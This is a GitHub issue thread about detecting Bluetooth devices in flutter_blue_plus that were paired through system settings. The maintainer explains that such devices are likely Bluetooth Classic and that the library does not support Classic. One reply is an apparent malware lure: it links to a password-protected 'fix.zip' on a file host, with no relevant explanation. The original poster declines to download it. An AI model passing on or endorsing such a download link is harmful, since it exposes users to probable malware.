chipweinberger/flutter_blue_plus #978: [Help]: Bluetooth Device Discovery (device connects from settings)

ryanpager, 2024-08-26:
### Requirements

- [X] I've looked at the README 'Common Problems' section

### Have you checked this problem on the example app?

Yes

### FlutterBluePlus Version

1.32.8

### Flutter Version

3.22.2

### What OS?

Android, iOS

### OS Version

17.5.1

### Bluetooth Module

Not Sure

### What is your problem?

So I am trying to detect when an rfid device connects from the system settings. The reason for this is that they are older bluetooth devices (12-24 months old). I don't believe them to be Bluetooth Classic, but they possibly could be (which I know this library doesnt support). 

Whats interesting is that there are a few applications out there that are able to detect when it connects through the system menu, and then goes ahead and allows for connection in the application. Some examples of this are,

Gallagher Performance App
https://apps.apple.com/nz/app/gallagher-animal-performance/id1495729013

Tru-Test App
https://apps.apple.com/us/app/tru-test-data-link/id893033296

Their process for connecting through the app is the following,

1. Go to Apple System Settings (Bluetooth)
2. Pair the reader like normal through the available devices
3. Once paired a prompt pops up that says "would you like X app to manage this device"
4. On yea, the device then shows up in the app and you can connect to it

Im stumped on how they are doing this -- I know its obviously possible to connect to them, but I am just trying to figure out what needs to be done in order to get this to work. Any help would be so appreciated.

### Logs

```shell
N/A
```

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ryanpager, 2024-08-26:
Not sure what that link is, but I am going to go ahead and skip downloading it.

closed 2024-08-26 by chipweinberger

ryanpager, 2024-08-26:
> use FlutterBluePlus.systemDevices

Hi Chip, I did try that. For BLE devices, it shows up (my newer readers show up), but for these specific devices they dont seem to show up in system devices at any point (even when connected through the system settings).

chipweinberger, 2024-08-26:
usually that means that are Classic

ryanpager, 2024-08-26:
> usually that means that are Classic

@chipweinberger In your opinion, does that mean I should write some native bridge code with swift to access the bluetooth classic manager? Just trying to figure out the best way to go about this.

chipweinberger, 2024-08-26:
no need to contribute 

classic is a non-goal

burekas7, 2024-08-28:
@ryanpager @chipweinberger 
Hi,
I have a similar issue.
I have a barcode scanner reader (Bur3076).

I paired the device through the iOS Bluetooth settings, but when checking the `FlutterBluePlus.systemDevices` I'm getting an empty list.
(Also in Android by the way, but there I do see the device when using `FlutterBluePlus.bondedDevices`)

So how can I actually see this device and using it?

chipweinberger, 2024-08-28:
earphones are classic

burekas7, 2024-08-28:
@chipweinberger 
If a device is a "Classic", it won't be found in the scan results or it did found but the name will be an empty strings?

What are the solution for Classic device today in Flutter?

How can I verify if my Barcode Scanner device (Bur3076) is a classic type?